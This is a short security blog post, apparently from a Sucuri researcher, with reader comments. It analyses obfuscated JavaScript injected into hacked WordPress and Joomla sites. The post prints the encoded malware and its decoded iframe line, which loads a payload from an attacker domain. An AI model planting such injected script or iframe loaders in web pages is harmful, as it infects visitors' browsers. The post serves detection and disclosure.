Malware Infections from rebotstat dot com

We are starting to share some of our research and view of web-based malware online: The #1 infection we are seeing in the last few days is caused by a heavily encoded piece of javascript malware:

<!– o –><script>b=new function()
{return 2;};if(!+b)String&#46prototype&#46vqwfbeweb=’h’+’arC';for(i 
in $=’b4h3tbn’)
if(i==’vqwfbeweb’)m=$[i];try{new Object()&#46wehweh();}catch(q)
{s=String["fr"+"omC"+m+"od"+’e’];}d=new Date();d2=new Date(d&#46valueOf()-2);Object&#46prototype&#46asd=’e';if({}&#46asd===’e’)a=document["c"+"r"+"e"+"a"+"
for(i=0;i<n&#46length;i++)ss +=s(e val("n"+"[i"+"]"));
if(!+b) e val(ss);</script><!– c –>

We are seeing this code added to the bottom of many compromised sites (from WordPress to Joomla, and many others). What this code does is to create an iFrame element to the site

document&#46write("<i frame src=’http://rebotstat&#46com/temp/stat&#46php’ width=’10’ height=’10’

From there, more malware is loaded and the browser visiting the site gets compromised (or at least that’s the goal of the attackers).

So if you are visiting a site and your anti virus is complaining about “Black Hole Exploit kit” or similar names, it could be compromised with this malware. You can scan a site here to verify: This is how our scanner classifies this malware:

*Note that we are seeing multiple variations of this type of malware (and different domains), but this latest is the most common now.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • LA Juice

    What are the signs of this kind of hack? are they downloading malware or hijacking the affected sites, or is there some obvious evidence of this hack? thanks much

  • mattmoreno

    How do we fix this so it doesn’t appear anymore!?

  • Andrei

    I had this problem and I removed everything from site code

Share This